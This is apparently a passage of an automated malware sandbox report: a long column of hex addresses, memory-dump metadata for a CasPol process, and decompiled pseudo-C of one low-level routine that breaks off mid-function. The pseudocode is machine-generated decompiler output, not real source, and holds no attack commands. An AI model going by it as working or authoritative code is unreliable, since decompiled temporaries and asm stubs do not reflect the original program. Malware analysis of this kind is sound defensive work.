                                                                        0x01415f8c
                                                                        0x01415f92
                                                                        0x01415f92
                                                                        0x01415f8c
                                                                        0x013bff74
                                                                        0x013bff77
                                                                        0x013bff7b
                                                                        0x01415f99
                                                                        0x01415f9b
                                                                        0x013bff81
                                                                        0x013bff81
                                                                        0x013bff83
                                                                        0x013bff83
                                                                        0x013bff88
                                                                        0x013bff8b
                                                                        0x013bff90
                                                                        0x013bff92
                                                                        0x013bff92
                                                                        0x013bff9c
                                                                        0x013bffa2
                                                                        0x013bffa6
                                                                        0x013bffaa
                                                                        0x013bffad
                                                                        0x013bffb2
                                                                        0x01415fa4
                                                                        0x01415faa
                                                                        0x01415faa
                                                                        0x01415fa4
                                                                        0x013bffb8
                                                                        0x00000000
                                                                        0x013bffb8
                                                                        0x013bff5b
                                                                        0x013c0054
                                                                        0x01415f3e
                                                                        0x01415f3e
                                                                        0x013bff09
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013bff0f
                                                                        0x013bff14
                                                                        0x01415f47
                                                                        0x01415f4d
                                                                        0x01415f4d
                                                                        0x01415f47
                                                                        0x013bff1c
                                                                        0x013c0046
                                                                        0x013c0076
                                                                        0x013c0078
                                                                        0x00000000
                                                                        0x013c0048
                                                                        0x013c0048
                                                                        0x013c004a
                                                                        0x013c004a
                                                                        0x00000000
                                                                        0x013c004a
                                                                        0x013bff22
                                                                        0x013bff22
                                                                        0x013bff26
                                                                        0x01415f56
                                                                        0x01415f5c
                                                                        0x01415f5c
                                                                        0x01415f56
                                                                        0x013bff2e
                                                                        0x00000000
                                                                        0x013bff34
                                                                        0x013bff36
                                                                        0x01415f65
                                                                        0x013bff3c
                                                                        0x013bff3c
                                                                        0x013bff3c
                                                                        0x013bff3e
                                                                        0x00000000
                                                                        0x013bff3e
                                                                        0x013bff2e
                                                                        0x013bff1c
                                                                        0x013bfef3
                                                                        0x013bfee3
                                                                        0x013bf9f9
                                                                        0x013bf9f9
                                                                        0x013bf9fb
                                                                        0x013bf9ff
                                                                        0x013bfbd5
                                                                        0x01415fb1
                                                                        0x01415fb1
                                                                        0x013bfbdf
                                                                        0x00000000
                                                                        0x013bfbe5
                                                                        0x013bfbe5
                                                                        0x013bfbe8
                                                                        0x013bfbed
                                                                        0x01415fdf
                                                                        0x013bfc01
                                                                        0x013bfc01
                                                                        0x013bfc04
                                                                        0x013bfc09
                                                                        0x01415fee
                                                                        0x01415ff4
                                                                        0x01415ff4
                                                                        0x01415fee
                                                                        0x013bfc0f
                                                                        0x013bfc13
                                                                        0x013bfc1d
                                                                        0x013bfc20
                                                                        0x013bfc23
                                                                        0x013bfc26
                                                                        0x013bfc2b
                                                                        0x01415ffd
                                                                        0x01416003
                                                                        0x01416003
                                                                        0x01415ffd
                                                                        0x013bfc33
                                                                        0x00000000
                                                                        0x013bfc39
                                                                        0x013bfc3b
                                                                        0x013bfc3e
                                                                        0x013bfc41
                                                                        0x013bfc46
                                                                        0x0141600c
                                                                        0x01416012
                                                                        0x01416012
                                                                        0x0141600c
                                                                        0x013bfc4e
                                                                        0x00000000
                                                                        0x013bfc54
                                                                        0x013bfc54
                                                                        0x013bfc59
                                                                        0x0141601b
                                                                        0x01416021
                                                                        0x01416021
                                                                        0x0141601b
                                                                        0x013bfc61
                                                                        0x00000000
                                                                        0x013bfc67
                                                                        0x013bfc6a
                                                                        0x013bfc6f
                                                                        0x0141602a
                                                                        0x01416030
                                                                        0x01416030
                                                                        0x0141602a
                                                                        0x013bfc77
                                                                        0x00000000
                                                                        0x013bfc7d
                                                                        0x013bfc7f
                                                                        0x013bfc81
                                                                        0x013bfc85
                                                                        0x013bfc87
                                                                        0x013bfc87
                                                                        0x013bfc8c
                                                                        0x013bfc8f
                                                                        0x013bfc94
                                                                        0x01416039
                                                                        0x013bfc9c
                                                                        0x013bfca4
                                                                        0x013bfcaa
                                                                        0x013bfcaf
                                                                        0x01416046
                                                                        0x013bfcbd
                                                                        0x013bfcbf
                                                                        0x0141606d
                                                                        0x01416073
                                                                        0x01416073
                                                                        0x0141606d
                                                                        0x013bfcc8
                                                                        0x013bfccd
                                                                        0x013bfccf
                                                                        0x013bfcd3
                                                                        0x013bfcd5
                                                                        0x013bfcd5
                                                                        0x013bfcde
                                                                        0x013bfce1
                                                                        0x013bfce3
                                                                        0x013bfce3
                                                                        0x013bfce8
                                                                        0x013bfcf0
                                                                        0x013bfcf2
                                                                        0x013bfcf5
                                                                        0x013bfcf7
                                                                        0x013bfcff
                                                                        0x013bfd02
                                                                        0x013bfd06
                                                                        0x013bfd11
                                                                        0x013bfd14
                                                                        0x013bfd17
                                                                        0x0141607c
                                                                        0x01416082
                                                                        0x01416082
                                                                        0x0141607c
                                                                        0x013bfd1f
                                                                        0x00000000
                                                                        0x013bfd25
                                                                        0x013bfd28
                                                                        0x013bfd2d
                                                                        0x0141608b
                                                                        0x01416091
                                                                        0x01416091
                                                                        0x0141608b
                                                                        0x013bfd35
                                                                        0x00000000
                                                                        0x013bfd3b
                                                                        0x013bfd3e
                                                                        0x013bfd43
                                                                        0x0141609a
                                                                        0x013c0016
                                                                        0x013c0018
                                                                        0x00000000
                                                                        0x013c001a
                                                                        0x013c001a
                                                                        0x013bfd82
                                                                        0x013bfd84
                                                                        0x014160d9
                                                                        0x014160df
                                                                        0x014160df
                                                                        0x014160d9
                                                                        0x013bfd8d
                                                                        0x013bfd95
                                                                        0x013bfd98
                                                                        0x013bfd9d
                                                                        0x014160e8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014160ee
                                                                        0x00000000
                                                                        0x013bfda3
                                                                        0x013bfda3
                                                                        0x013bfda5
                                                                        0x013bfe8b
                                                                        0x013bfe90
                                                                        0x013bfe95
                                                                        0x014160f7
                                                                        0x014160fd
                                                                        0x014160fd
                                                                        0x014160f7
                                                                        0x013bfe9d
                                                                        0x00000000
                                                                        0x013bfea3
                                                                        0x013bfea5
                                                                        0x01416106
                                                                        0x013bfeab
                                                                        0x013bfeab
                                                                        0x013bfeab
                                                                        0x013bfeb2
                                                                        0x013bfeb5
                                                                        0x00000000
                                                                        0x013bfeb5
                                                                        0x013bfe9d
                                                                        0x013bfdab
                                                                        0x013bfdad
                                                                        0x0141610f
                                                                        0x01416115
                                                                        0x01416115
                                                                        0x0141610f
                                                                        0x013bfdb6
                                                                        0x013bfdbb
                                                                        0x0141611e
                                                                        0x01416120
                                                                        0x013bfdc1
                                                                        0x013bfdc1
                                                                        0x013bfdc5
                                                                        0x013bfdc5
                                                                        0x013bfdc7
                                                                        0x013bfdcc
                                                                        0x013bfdce
                                                                        0x013bfdce
                                                                        0x013bfdd6
                                                                        0x013bfdd8
                                                                        0x00000000
                                                                        0x013bfdd8
                                                                        0x013bfd9d
                                                                        0x013c0018
                                                                        0x014160a0
                                                                        0x014160a0
                                                                        0x013bfd4b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013bfd51
                                                                        0x013bfd56
                                                                        0x014160a9
                                                                        0x014160af
                                                                        0x014160af
                                                                        0x014160a9
                                                                        0x013bfd5e
                                                                        0x013bfebf
                                                                        0x014160b8
                                                                        0x013bfec5
                                                                        0x013bfec5
                                                                        0x013bfec5
                                                                        0x013bfec7
                                                                        0x00000000
                                                                        0x013bfd64
                                                                        0x013bfd64
                                                                        0x013bfd68
                                                                        0x014160c1
                                                                        0x014160c7
                                                                        0x014160c7
                                                                        0x014160c1
                                                                        0x013bfd70
                                                                        0x00000000
                                                                        0x013bfd76
                                                                        0x013bfd78
                                                                        0x014160d0
                                                                        0x013bfd7e
                                                                        0x013bfd7e
                                                                        0x013bfd7e
                                                                        0x013bfd80
                                                                        0x00000000
                                                                        0x013bfd80
                                                                        0x013bfd70
                                                                        0x013bfd5e
                                                                        0x013bfd35
                                                                        0x013bfd1f
                                                                        0x0141604c
                                                                        0x0141604c
                                                                        0x013bfcb7
                                                                        0x013bffc0
                                                                        0x013bffc3
                                                                        0x013bffc6
                                                                        0x013bffcb
                                                                        0x01416055
                                                                        0x0141605b
                                                                        0x0141605b
                                                                        0x01416055
                                                                        0x013bffd3
                                                                        0x00000000
                                                                        0x013bffd9
                                                                        0x013bffdb
                                                                        0x01416064
                                                                        0x013bffe1
                                                                        0x013bffe1
                                                                        0x013bffe1
                                                                        0x013bffe3
                                                                        0x013bffe7
                                                                        0x013bffed
                                                                        0x00000000
                                                                        0x013bffed
                                                                        0x013bffd3
                                                                        0x00000000
                                                                        0x013bfcb7
                                                                        0x0141603f
                                                                        0x013bfc9a
                                                                        0x00000000
                                                                        0x013bfc9a
                                                                        0x013bfc77
                                                                        0x013bfc61
                                                                        0x013bfc4e
                                                                        0x013bfc33
                                                                        0x01415fe5
                                                                        0x01415fe5
                                                                        0x013bfbf5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013bfbf5
                                                                        0x013bfbdf
                                                                        0x013bfa05
                                                                        0x013bfa05
                                                                        0x013bfa0a
                                                                        0x013bfe14
                                                                        0x01415fb8
                                                                        0x01415fb8
                                                                        0x013bfe1e
                                                                        0x00000000
                                                                        0x013bfe24
                                                                        0x00000000
                                                                        0x013bfe24
                                                                        0x013bfe1e
                                                                        0x013bfa10
                                                                        0x013bfa10
                                                                        0x013bfa15
                                                                        0x013bfe29
                                                                        0x013bfe2d
                                                                        0x013bfe35
                                                                        0x013bfe38
                                                                        0x013bfe3b
                                                                        0x01415fc1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01415fc7
                                                                        0x013bfe43
                                                                        0x013bfe45
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013bfe4b
                                                                        0x013bfe50
                                                                        0x01415fd0
                                                                        0x01415fd6
                                                                        0x01415fd6
                                                                        0x01415fd0
                                                                        0x013bfe5d
                                                                        0x013bfe60
                                                                        0x00000000
                                                                        0x013bfe60
                                                                        0x013bfe41
                                                                        0x013bfe41
                                                                        0x00000000
                                                                        0x013bfa1b
                                                                        0x013bfa1b
                                                                        0x013bfa1d
                                                                        0x013bfa20
                                                                        0x00000000
                                                                        0x013bfa20
                                                                        0x013bfa15
                                                                        0x013bf9ed
                                                                        0x013bf9ed
                                                                        0x00000000
                                                                        0x013bf9ed
                                                                        0x013bf9cd
                                                                        0x013bf9ba
                                                                        0x013bf9ba
                                                                        0x00000000
                                                                        0x013bf9ba
                                                                        0x013bfba8
                                                                        0x013bfb65
                                                                        0x013bfb1d
                                                                        0x013bfb23
                                                                        0x013bfb26
                                                                        0x00000000
                                                                        0x013bfb26
                                                                        0x013bfaf3
                                                                        0x013bfaf3
                                                                        0x00000000
                                                                        0x013bfaf3
                                                                        0x013bfab4
                                                                        0x013bfa79
                                                                        0x013bfa56
                                                                        0x013bfa56
                                                                        0x00000000
                                                                        0x013bfa56
                                                                        0x013bf94d
                                                                        0x013bf950
                                                                        0x013bf955
                                                                        0x01415e79
                                                                        0x01415e7f
                                                                        0x01415e7f
                                                                        0x01415e79
                                                                        0x013bf95b
                                                                        0x013bf960
                                                                        0x01415e88
                                                                        0x01415e8a
                                                                        0x01415e8a
                                                                        0x01415e8e
                                                                        0x01415e93
                                                                        0x00000000
                                                                        0x01415e99
                                                                        0x01415e9c
                                                                        0x01415e9f
                                                                        0x01415ea1
                                                                        0x01415ea3
                                                                        0x01415ea3
                                                                        0x01415ea7
                                                                        0x00000000
                                                                        0x01415ea7
                                                                        0x013bf966
                                                                        0x013bf966
                                                                        0x013bf96b
                                                                        0x01415eb0
                                                                        0x01415eb6
                                                                        0x01415eb6
                                                                        0x01415eb0
                                                                        0x013bf973
                                                                        0x013bfbc7
                                                                        0x013bf9a5
                                                                        0x013bf9a5
                                                                        0x00000000
                                                                        0x013bf979
                                                                        0x013bf97d
                                                                        0x013bf97f
                                                                        0x01415ebf
                                                                        0x01415ec5
                                                                        0x01415ec5
                                                                        0x01415ebf
                                                                        0x013bf987
                                                                        0x00000000
                                                                        0x013bf98d
                                                                        0x013bf98d
                                                                        0x013bf990
                                                                        0x013bf994
                                                                        0x013bf997
                                                                        0x013bf99f
                                                                        0x013bfff7
                                                                        0x013c0061
                                                                        0x013c0064
                                                                        0x013c006a
                                                                        0x01415ece
                                                                        0x01415ed0
                                                                        0x01415ed0
                                                                        0x00000000
                                                                        0x013c0064
                                                                        0x013bfffd
                                                                        0x013c0000
                                                                        0x00000000
                                                                        0x013c0006
                                                                        0x01415ecc
                                                                        0x00000000
                                                                        0x01415ecc
                                                                        0x013c0000
                                                                        0x00000000
                                                                        0x013bf99f
                                                                        0x013bf987
                                                                        0x013bf973

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                                        • Instruction ID: 59266f506e1e8e371d6c8a2834d3d00e07c5febb8f422835a7007cf7c2263745
                                                                        • Opcode Fuzzy Hash: fc66cec98a30fadb5342584c4926ef08b8d30d1ee31ce6150576712f1cb138a4
                                                                        • Instruction Fuzzy Hash: B5621735E047668BDF26CE2C88C02FAFBB8AF85618F199159CE549BB57E371DC418780
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 01485BA5 Relevance: .6, Instructions: 592COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 88%
                                                                        			E01485BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1491178);
				E0140D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01484C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E013FD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01485542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x14a60e8;
								if( *0x14a60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x14a60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E013F9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E013F6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E013FF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E013FF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E013FF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E013FFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E013FFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E013FF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E013FF3E0( *(_t528 - 0xb8), _t457, _t506);
